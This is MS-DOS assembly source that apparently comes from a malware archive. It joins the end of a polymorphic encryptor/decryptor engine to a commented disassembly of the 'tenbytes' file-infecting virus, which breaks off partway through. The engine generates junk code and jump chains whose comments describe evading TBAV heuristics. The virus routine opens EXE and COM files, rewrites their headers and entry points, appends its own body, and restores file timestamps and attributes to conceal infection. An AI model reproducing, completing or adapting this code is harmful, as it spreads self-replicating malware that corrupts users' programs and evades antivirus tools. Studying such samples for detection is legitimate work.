init_count: ;Initialises Count Register..
call get_unused_reg ;Make Count Initialiser in Encryptor and
cmp al,tce_DX
je init_count
mov count_reg,al ;Decryptor
mov bx,W c_length
shr bx,1
mov W enc_length,bx
call gen_mov_reg
ret
init_index: ;Initialises Index Register..
mov ax,0ff ;Makes Index Initialiser in Encryptor and
call get_rand ;Decryptor..
push ax
call get_rand_7
pop ax
if z xor ax,ax
mov B index_off,al
mov bx,DECRYPTOR_LENGTH
add bx, tce_begin
mov W enc_index,bx
add bx, tce_delta
cbw
sub bx,ax
get_index:
call get_unused_reg
cmp al,tce_BX
jb get_index
mov W index_num,ax
mov B index_reg,al
mov B index_set,1
call gen_mov_reg
mov B index_set,0
ret
gen_decrypt: ;generates DECRYPTOR / ENCRYPTOR instruction
mov W loop_start,di
call pad_8
mov bl,B key_reg
sal bl,3
call get_rand_2
add ax,ax
add ax,offset enc_table
xchg si,ax
lodsw
call binary
if z xchg ah,al
push ax
cmp si,offset enc_table + 2
jne no_carry_set
mov al,0f8
call binary
if z inc ax
mov B enc_cf,al
stosb
no_carry_set:
test W tce_flags,ADD_SEG
jz no_seg_set
mov al,2e
stosb
no_seg_set:
pop ax
stosb
mov B enc_loop,ah
mov si,W index_num
cmp B index_reg,tce_BP
je encryptor_has_offset
cmp B index_off,0
jne encryptor_has_offset
push ax
call get_rand_7
pop ax
jz encryptor_has_offset
add si,index_tab_c
lodsb
or al,bl
stosb
ret
encryptor_has_offset:
add si,index_tab_b
lodsb
or al,bl
mov ah,B index_off
or al,bl
stosw
xchg al,ah
cbw
call binary
jnz ret
mov al,ah
stosb
add es:B[di-3],40
ret
modify_key: ;Modify Key: XOR/ADD/SUB key_reg,xxxx
call get_rand_7
jz no_mod_key
call get_rand_2
add ax,offset modify_table
xchg si,ax
lodsb
mov ah,al
mov al,81
mov W enc_mod_op,ax
or ah,B key_reg
stosw
call get_any_rand
stosw
no_mod_key:
mov W enc_mod_val,ax
ret
inc_index: ;increase index by 2..
call binary ;1 in 2 chance of ADD reg,2/SUB reg,-2
jz add_sub_index
mov al,B index_reg
or al,40
stosb
call pad_8
stosb
ret
add_sub_index:
mov al,83
stosb
mov ah,2
mov al,B index_reg
or al,0c0
call binary
jnz put_add_sub_index
neg ah
or al,0e8
put_add_sub_index:
stosw
ret
gen_loop:
mov al,B count_reg
cmp al,tce_CX
jne not_CX
push ax
call get_rand_7
pop ax
jz not_CX
lea bx,[di+2]
mov ax,W loop_start
sub ax,bx
mov ah,0e2
call binary
jnz no_loop_nz
xchg bp,ax
jmp short do_loop_nz
no_loop_nz:
xchg ah,al
stosw
ret
not_CX: xchg bx,ax
call binary
jz count_add_sub
mov al,48
or al,bl
stosb
jmp short zero_test
count_add_sub:
mov al,83
stosb
mov ah,-1
mov al,bl
or al,0c0
call binary
jnz put_add_sub_count
neg ah
or al,0e8
put_add_sub_count:
stosw
xor bp,bp
push ax
call get_rand_7
pop ax
jz nloop_nz
zero_test:
call pad_10
xor bp,bp
do_loop_nz:
mov al,B count_reg
mov bl,al
sal al,3
or al,bl
xchg ah,al
mov bh,ah
call get_rand_2
add ax,offset zero_test_a
xchg si,ax
lodsb
mov ah,bh
or ah,0c0
stosw
nloop_nz:
lea bx,[di+2]
mov ax,W loop_start
sub ax,bx
or bp,bp
jnz loop_nz
mov ah,075
call binary
jnz nnnn
mov B es:[di],0f8
inc di
sub ax,0fe01
db 0a9
loop_nz:mov ah,0e0
nnnn: xchg ah,al
stosw
ret
init_key:
call get_any_rand
mov W enc_key,ax
xchg bx,ax
call get_unused_reg
mov B key_reg,al
gen_mov_reg:
call binary
jz lea_mov
or al,0b8
stosb
xchg ax,bx
jmp short put_mov_b
lea_mov:call binary
jz zero_then_add
sal al,3
or al,06
mov ah,8d
xchg ah,al
stosw
xchg ax,bx
jmp short put_mov_b
zero_then_add: ;Zero Register (XOR/SUB reg,reg)
push bx ;Then OR/XOR/ADD Value
push ax ;or SUB -Value
mov ah,0c0
or ah,al
sal al,3
or ah,al
mov al,29
call binary
if z mov al,31
stosw
call pad_10
pop bx
call get_rand_2
add ax,offset value_from_0
xchg si,ax
lodsb
call binary
jz zero_then_sub
or al,bl
mov ah,81
xchg ah,al
stosw
pop ax
put_mov_b:
cmp B index_set,01
if e mov W index_loc,di
stosw
ret
zero_then_sub:
cmp B index_set,01
if e mov B index_sub,1
mov al,0e8
or al,bl
mov ah,81
xchg ah,al
stosw
pop ax
neg ax
jmp short put_mov_b
pad_8: push ax ;Sub Procedure to Pad Between 1 and 8 bytes
call get_rand_7
inc ax
jmp short padder
pad_10: push ax
call get_rand_1f ;Sub Procedure to Pad Between 8 and 16 bytes
or al,8
padder: xchg cx,ax
call more_junk
pop ax
ret
more_junk:
mov al,03
call get_rand_b
jnz mj0
mov B [offset code_jmp],083 ;Re-Enable Jumps
mov ax,cx ;else normal filler junk (1 in 16)
cmp ax,40
if a mov al,40
call get_rand_b
xchg bx,ax
call fill_jnk
jmp short mj2
mj0: ;8 in 16 chance of some type of jump
call code_jmp
mj2: jcxz ret
jmp short more_junk
one_byte: ;GENERATES A ONE BYTE JUNK INSTRUCTION
jcxz ret
mov si,one_byters ;FROM one_byters TABLE
mov al,length_1
call get_rand_b
add si,ax
movsb
dec cx
dec bx
ret
reg_op: call get_rand_7 ;ANY OP unused_reg16,reg16..
sal al,3
or al,3
xchg dx,ax
call get_unused_reg
sal al,3
mov dh,al
call get_rand_7
do_op: or dh,al
or dh,0c0
xchg dx,ax
put_2: cmp bx,2
jb one_byte
stosw
dec cx,2
dec bx,2
ret
lea_reg:call get_rand_7 ;LEA unused_reg,[BP/BX/SI/DI]
cmp al,6
je lea_reg
xchg dx,ax
call get_unused_reg
sal al,3
or al,dl
mov ah,08d
xchg ah,al
jmp short put_2
op_ax: call get_any_rand
and al,8
or al,5
and ah,3
shr ah,4
or al,ah
put_3: cmp bx,3
jb reg_op
stosb
call get_any_rand
put_3b: stosw
sub cx,3
sub bx,3
ret
mov_reg:call get_unused_reg ;MOV unused_reg16,xxxx
or al,0b8
jmp short put_3
op_reg_im: ;cmp/add/sub/adc/sbb/or/xor/and reg16,imm16
cmp bx,4
jb op_ax
call get_unused_reg
mov ah,81
xchg dx,ax
call get_rand_7
sal al,3
or ax,dx
xchg ah,al
or ah,0c0
stosw
call get_any_rand
stosw
sub bx,4
sub cx,4
ret
code_jmp:
cmp cx,3
jb ret
mov B [offset code_jmp],0c3 ;Disable Jumps.This ensures Unchained
;(TBAV-J) and helps stops heuristics
call get_any_rand ;else conditional jmp
and ax,1f0f ;between 4 and 43 bytse jmp length
add ah,4
or al,70 ;conditional jmp instructions are 70
;--> 7f
push ax
call get_rand_1f
pop ax
if z mov al,0e3
xor bx,bx
mov bl,ah
dec cx,2
cmp bx,cx
jb put_jmp
mov bx,cx
mov ah,bl
put_jmp:stosw
fill_jnk:
or bx,bx
jz ret
mov al,((offset binary - offset junk_tbl)/2)-1
call get_rand_b
add ax,ax
add ax,offset junk_tbl
xchg si,ax
lodsw
call ax
jmp short fill_jnk
pp_reg: ;generate PUSH reg / junk / POP reg
cmp bx,3
jb gen_int
lea ax,[bx-2]
shr ax,1
call get_rand
xchg ax,dx
call get_rand_7
or al,50
stosb
dec cx
dec bx
push ax
xchg dx,ax
sub bx,ax
push bx
xchg bx,ax
call fill_jnk
pop bx
pop ax
call binary
jz use_same
call get_unused_reg
or al,50
use_same:
or al,8
stosb
dec cx
dec bx
ret
gen_int:cmp bx,4
jb ret
call get_rand_2
add ax,ax
add ax,offset int_tbl
xchg si,ax
lodsw
mov dx,0cdb4
xchg al,dl
stosw
xchg dx,ax
xchg ah,al
stosw
sub cx,4
sub bx,4
ret
junk_tbl: dw offset op_reg_im
dw offset op_reg_im
dw offset op_reg_im
dw offset gen_int
dw offset gen_int
dw offset pp_reg
dw offset pp_reg
dw offset reg_op
dw offset reg_op
dw offset lea_reg
dw offset lea_reg
dw offset mov_reg
dw offset op_ax
dw offset one_byte
binary: push ax
mov al,1
call get_rand_b
pop ax
ret
get_rand_2:
mov al,2
db 0a9
get_rand_7:
mov al,7
db 0a9
get_rand_1f:
mov al,1f
db 0a9
get_any_rand: ;return rnd number in AX between 0 and FFFE
mov al,0fe
get_rand_b:
cbw
get_rand: ;returns random number in AX between 0 and AX
push cx,dx
inc ax
push ax
in ax,40
xchg cx,ax
in ax,40
rol ax,cl
xchg cx,ax
in ax,40
xor ax,cx
adc ax,1234
org $-2
last_rand dw 0AAAA
mov last_rand,ax
pop cx
xor dx,dx
cmp cx,1
adc cx,0
div cx
xchg dx,ax
or ax,ax
pop dx,cx
ret
one_byters: cmc ;15 1 byte junk instructions
cld
std
in ax,dx
in al,dx
lahf
cbw
nop
aaa
aas
daa
das
inc ax
dec ax
xlat
int_tbl: dw 0116 ;AH=01,INT16: Check Keyboard Buffer..
dw 0216 ;AH=02,INT16: Get Keyboard States..
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
dw 0d10 ;AH=0D,INT10: Get Video Info..
dw 0b21 ;AH=0B,INT21: Check Keyboard Buffer..
dw 002a
dw 002a
clear_regs: cwd
mov B index_reg,dl ;Clears Register Tables
mov B key_reg,dl ;(All Regs Free)..
mov B count_reg,dl
ret
get_unused_reg: call get_rand_7 ;Return an Unused Register..
test al,NOT tce_SP ;But _NOT_ SP, or AX.
jz get_unused_reg
cmp al,index_reg
je get_unused_reg
cmp al,count_reg
je get_unused_reg
cmp al,B key_reg
je get_unused_reg
ret
;**********************************************
;* The Encryptor (Built along with Decryptor) *
;**********************************************
encryptor: mov cx,1234
org $-2
enc_length dw 0
mov bx,1234
org $-2
enc_index dw 0
mov ax,1234
org $-2
enc_key dw 0
enc_cf: nop
enc_loop: xor [bx],ax
enc_mod_op dw 0
enc_mod_val dw 0
inc bx,2
loop enc_cf
ret
;****************************
;* Data / Variables / Flags *
;****************************
init_1 dw offset init_count
init_2 dw offset init_key
init_3 dw offset init_index
init_4 dw offset inc_index
init_5 dw offset modify_key
;* The Below is A table of Values to Be Used To Choose *
;* The Count Register, The Index Register, and The Reg *
;* to save SP in During the Decryptor Loop *
; BX BP SI DI ;This Table is used To Build
index_tab_b: db 0,0,0,47,0,46,44,45 ;The Decryptor Instruction
index_tab_c: db 0,0,0,7,0,0,4,5 ;Same As Above
; SBB ADC XOR XOR ADD SUB
enc_table: db 19, 11, 31, 31, 01, 29 ;The Decryptor Opcodes..
; AND OR TEST
zero_test_a: db 21, 09,85
; SUB ;Opcodes to Modify the Key
modify_table: db 0e8 ;Register
; ADD XOR OR ;Opcode to get A value
value_from_0: db 0c0,0f0,0c8 ;from 0.
loop_start dw 0 ;Postion for LOOP to Jump to..
index_num dw 0
index_off db 0 ;OFFSET of INDEX reference (i.e: [SI+XX]).
index_loc dw 0 ;location in ES of index reference set
index_sub db 0 ;Was index_reg set using 0 the sub -value?
index_reg db 0 ;Table of Used Registers..
count_reg db 0 ;used in GET_UNUSED_REG
key_reg db 0
index_set db 0
tce_flags dw 0 ;Engines Flags
tce_delta dw 0 ;Delta Offset
tce_begin dw 0 ;Beginning
c_length dw 0
end_tce:

826
MSDOS/Virus.MSDOS.Unknown.tenbytes.asm Normal file
View File

@ -0,0 +1,826 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: mov ax,es ;0100 8C C0
add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E
jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C
d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138
;<- duplicated code (aligning to 20h bytes)
db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41
db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B
;..............................................................
; victim code
;..............................................................
org 1380h
;============================================================================
; Segment aligned virus segment begin
;----------------------------------------------------------------------------
;================================================================
; COM virus Entry
; (this code is present only in case *.COM infection)
;----------------------------------------------------------------
l_0000: push ds ;1380 1E
push cs ;1381 0E
pop ds ;1382 1F
lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7
mov di,100h ;1387.BF 0100
mov cx,20h ;138A B9 0020
rep movsb ;restore victim bytes ;138D F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF
nop ;1395 90
pop ds ;1396 1F
lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F
jmp ax ;139B FF E0
;<--- duplicated fields d_033F - d_0347
dw 0020 ;139D 20 00
dw 05EAh ;139F EA 05
dw 0Bh ;13A1 0B 00
dw 28h ;13A3 28 00
dw 200h ;13A5 00 02
db 0 ;13A7 00
;===========================================================================
; Begin of file type independent virus code
;---------------------------------------------------------------------------
;================================================================
; Get/Set victim attribute
;----------------------------------------------------------------
s_13A8 proc near
mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F
mov ah,43h ;get/set file attrb ;13AB B4 43
int 21h ;13AD CD 21
retn ;13AF C3
s_13A8 endp
;================================================================
; Move file ptr to EOF
;----------------------------------------------------------------
s_13B0 proc near
xor cx,cx ;13B0 33 C9
xor dx,dx ;13B2 33 D2
mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202
mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B
int 21h ;13BC CD 21
retn ;13BE C3
s_13B0 endp
;================================================================
; Read 32 bytes into buffer
;----------------------------------------------------------------
s_13BF proc near
mov cx,20h ;13BF B9 0020
mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B
mov ah,3Fh ;read file ;13CA B4 3F
int 21h ;13CC CD 21
mov cx,ax ;bytes read ;13CE 8B C8
retn ;13D0 C3
s_13BF endp
;================================================================
; Write 32 B into file
;----------------------------------------------------------------
s_13D1 proc near
mov ax,8 ;switch off destruction ;13D1 B8 0008
mov es,ax ;13D4 8E C0
mov cx,20h ;13D6 B9 0020
mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B
mov ah,40h ;write file cx=bytes ;13E1 B4 40
int 21h ;13E3 CD 21
mov cx,ax ;13E5 8B C8
retn ;13E7 C3
s_13D1 endp
;================================================================
; Calculate virus length
;----------------------------------------------------------------
s_13E8 proc near
mov ax,612h ;virus code length ;13E8 B8 0612
mov dx,28h ;file type depended code;13EB BA 0028
sub ax,dx ;13EE 2B C2
mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341
retn ;13F3 C3
s_13E8 endp
;================================================================
; Get/Set file daye & time
;----------------------------------------------------------------
s_13F4 proc near
mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B
mov ah,57h ;get/set file date & time ;13F8 B4 57
int 21h ;13FA CD 21
retn ;13FC C3
s_13F4 endp
;================================================================
; Contamine File - master routine
;----------------------------------------------------------------
s_13FD proc near
mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00
nop ;1402 90
mov al,0 ;1403 B0 00
call s_13A8 ;Get victim attribute ;1405 E8 FFA0
jc l_146A ;-> EXIT ;1408 72 60
mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F
mov cx,20h ;140E B9 0020
mov al,1 ;1411 B0 01
call s_13A8 ;Set victim attribute ;1413 E8 FF92
jc l_146A ;-> EXIT ;1416 72 52
jmp short l_1421 ;1418 EB 07
nop ;141A 90
d_009B dw 0005h ;file handle ;141B 05 00
d_009D dw 0400h ;141D 00 04
d_009F dw 057Fh ;filepath address ;141F 7F 05
l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05
mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F
mov ax,400h ;142C B8 0400
mov ds:[9Dh],ax ;l_141D ;142F A3 009D
mov al,2 ;1432 B0 02
mov ah,3Dh ;open file, al=mode ;1434 B4 3D
int 21h ;1436 CD 21
mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF
jc l_1443 ;143E 72 03
mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B
l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B
cmp ax,0FFFFh ;1446 3D FFFF
je l_146A ;-> EXIT, open file err ;1449 74 1F
mov al,0 ;144B B0 00
call s_13F4 ;Get file daye & time ;144D E8 FFA4
jc l_148F ;-> err, close & exit ;1450 72 3D
mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8
mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED
call s_13BF ;Read 32 B into buffer ;145A E8 FF62
mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7
cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D
je l_146F ;-> yes, EXE ;1463 74 0A
jmp l_1616 ;-> no, COM ;1465 E9 01AE
d_00E8 dw 0EF8h ;victim date ;1468 F8 0E
l_146A: jmp l_15C6 ;146A E9 0159
d_00ED dw 0001h ;victim time ;146D 01 00
;================================================================
; EXE file contamination
;----------------------------------------------------------------
l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509
neg ax ;1472 F7 D8
cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9
je l_148F ;-> allready infected ;1478 74 15
mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB
cmp ax,3 ;147D 3D 0003
jb l_148F ;-> file to small ;1480 72 0D
mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF
mov cl,4 ;1485 B1 04
shl ax,cl ;1487 D3 E0
mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347
jmp short l_1492 ;148C EB 04
nop ;148E 90
l_148F: jmp l_15A8 ;148F E9 0116
l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B
mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4
mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028
call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F
push ax ;14A1 50
push dx ;14A2 52
sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347
sbb dx,0 ;14A7 83 DA 00
mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439
mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437
cmp dx,0 ;14B1 83 FA 00
ja l_14D3 ;-> more then 64KB ;14B4 77 1D
cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B
ja l_14D3 ;-> more then 28h length;14BA 77 17
;<- EXE code length =< 28h
mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000
mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B
sub bx,ax ;28h - file length ;14C6 2B D8
mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343
mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513
jmp short l_1511 ;14D0 EB 3F
nop ;14D2 90
l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B
sbb dx,0 ;14D7 83 DA 00
mov ds:[345h],ax ;d_16C5 ;14DA A3 0345
and ax,0Fh ;14DD 25 000F
cmp ax,0 ;14E0 3D 0000
jne l_14F9 ;-> need aligment ;14E3 75 14
mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000
mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345
mov cx,10h ;14EE B9 0010
div cx ;14F1 F7 F1
mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345
jmp short l_1511 ;14F6 EB 19
db 90h ;14F8 90
;<---- need alignment
l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010
sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343
mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345
mov cx,10h ;1506 B9 0010
div cx ;1509 F7 F1
add ax,1 ;+ alignment paragraph ;150B 05 0001
mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345
l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D
mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6
mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345
mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D
push ax ;151D 50
mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505
mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1
pop ax ;1524 58
mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505
mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507
mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3
lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612
add ax,1Eh ;virus stack ;1532 05 001E
add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343
mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507
call s_13E8 ;Calculate virus length ;153C E8 FEA9
pop dx ;<- victim EOF ;153F 5A
pop ax ;1540 58
add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341
adc dx,0 ;1545 83 D2 00
add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343
adc dx,0 ;154C 83 D2 00
mov cx,200h ;page length ;154F B9 0200
div cx ;1552 F7 F1
cmp dx,0 ;1554 83 FA 00
je l_155A ;1557 74 01
inc ax ;1559 40
l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB
mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9
neg dx ;1561 F7 DA
mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509
mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F
mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B
cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03
jb l_1580 ;1573 72 0B
;<- file begins with jump
mov cx,28h ;1575 B9 0028
sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343
mov word ptr ds:[50Bh],cx ;157C 89 0E 050B
l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C
call s_13D1 ;Write 32 B into file ;1583 E8 FE4B
jc l_15A8 ;-> error, EXIT ;1586 72 20
mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343
sub cx,3 ;jmp instruction length ;158C 83 E9 03
mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F
mov bx,28h ;beginning of code ;1592 BB 0028
sub ax,bx ;jmp distance ;1595 2B C3
add cx,ax ;aligning bytes ;1597 03 C8
mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C
call s_13B0 ;Move file ptr to EOF ;159D E8 FE10
call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024
jc l_15A8 ;-> error, EXIT ;15A3 72 03
call s_15FE ;Write const part of vir;15A5 E8 0056
;================================================================
; End of contamination (common to EXE & COM)
;----------------------------------------------------------------
l_15A8: mov al,1 ;to set ;15A8 B0 01
mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8
mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED
call s_13F4 ;Set file daye & time ;15B2 E8 FE3F
mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B
mov ah,3Eh ;close file ;15B9 B4 3E
int 21h ;15BB CD 21
mov al,1 ;to set ;15BD B0 01
mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F
call s_13A8 ;Set victim attribute ;15C3 E8 FDE2
l_15C6: retn ;15C6 C3
;================================================================
; Align end of file to paragraphs
;----------------------------------------------------------------
s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008
mov es,ax ;15CA 8E C0
mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343
mov dx,54Bh ;offset d_18CB ;15D0.BA 054B
mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B
mov ah,40h ;write file ;15D8 B4 40
int 21h ;15DA CD 21
mov cx,ax ;15DC 8B C8
retn ;15DE C3
;================================================================
; Set file pointer to BOF
;----------------------------------------------------------------
s_15DF: xor cx,cx ;15DF 33 C9
xor dx,dx ;15E1 33 D2
mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200
mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B
int 21h ;15EB CD 21
retn ;15ED C3
;================================================================
; COM virus start code pattern
;----------------------------------------------------------------
d_026E: mov ax,es ;15EE 8C C0
add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E
jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C
d_027A dw 0 ;15FA 00 00
d_027C dw 0138h ;15FC 38 01
;================================================================
; Write constant part of virus
;----------------------------------------------------------------
s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008
mov es,ax ;1601 8E C0
mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341
mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028
mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B
mov ah,40h ;write file ;160F B4 40
int 21h ;1611 CD 21
mov cx,ax ;1613 8B C8
retn ;1615 C3
;================================================================
; COM victim contamination
;----------------------------------------------------------------
l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E
je l_15A8 ;-> contamined, EXIT ;161C 74 8A
call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F
cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8
jb l_169F ;-> bellow, EXIT ;1624 72 79
add ax,100h ;add PSP ;1626 05 0100
adc dx,0 ;1629 83 D2 00
push ax ;162C 50
and ax,0Fh ;162D 25 000F
mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000
cmp ax,0 ;1636 3D 0000
je l_1645 ;-> para aligned file ;1639 74 0A
mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010
sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343
l_1645: pop ax ;1645 58
add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343
adc dx,0 ;164A 83 D2 00
cmp dx,0 ;164D 83 FA 00
ja l_169F ;-> file to big, EXIT ;1650 77 4D
mov cl,4 ;1652 B1 04
shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8
cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00
mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C
mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000
call s_15DF ;Set file pointer to BOF;1664 E8 FF78
mov ax,8 ;to switch off virus ;1667 B8 0008
mov es,ax ;166A 8E C0
mov cx,20h ;bytes to write ;166C B9 0020
mov dx,26Eh ;offset l_15EE ;166F.BA 026E
mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B
mov ah,40h ;write file ;1677 B4 40
int 21h ;1679 CD 21
mov cx,ax ;bytes written ;167B 8B C8
call s_13B0 ;Move file ptr to EOF ;167D E8 FD30
call s_15C7 ;write aligning bytes ;1680 E8 FF44
mov ax,8 ;switch off virus ;1683 B8 0008
mov es,ax ;1686 8E C0
mov cx,28h ;40 bytes ;1688 B9 0028
mov dx,322h ;offset l_16A2 ;168B .BA 0322
mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B
mov ah,40h ;write file ;1693 B4 40
int 21h ;1695 CD 21
mov cx,ax ;bytes written ;1697 8B C8
call s_13E8 ;Calculate virus length ;1699 E8 FD4C
call s_15FE ;Write const part of vir;169C E8 FF5F
l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06
s_13FD endp
;<-- COM type virus begin pattern
d_0322: push ds ;16A2 1E
push cs ;16A3 0E
pop ds ;16A4 1F
lea si,cs:[4F7h] ;16A5 8D 36 04F7
mov di,0100h ;16A9.BF 0100
mov cx,20h ;16AC B9 0020
rep movsb ;16AF F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF
nop ;16B7 90
pop ds ;16B8 1F
lea ax,cs:[54Fh] ;16B9 8D 06 054F
jmp ax ;16BD FF E0
;------ work area
d_033F dw 0020h ;oryg. file attr ;16BF 20 00
d_0341 dw 05EAh ;const virus code length;16C1 EA 05
d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00
d_0345 dw 28h ;16C5 28 00
d_0347 dw 200h ;size of header ;16C7 00 02
d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00
;================================================================
; init registers
;----------------------------------------------------------------
s_16CA proc near
xor si,si ;16CA 33 F6
xor di,di ;16CC 33 FF
xor ax,ax ;16CE 33 C0
xor dx,dx ;16D0 33 D2
xor bp,bp ;16D2 33 ED
retn ;16D4 C3
s_16CA endp
;================================================================
; int 24h handling routine (infection time active only)
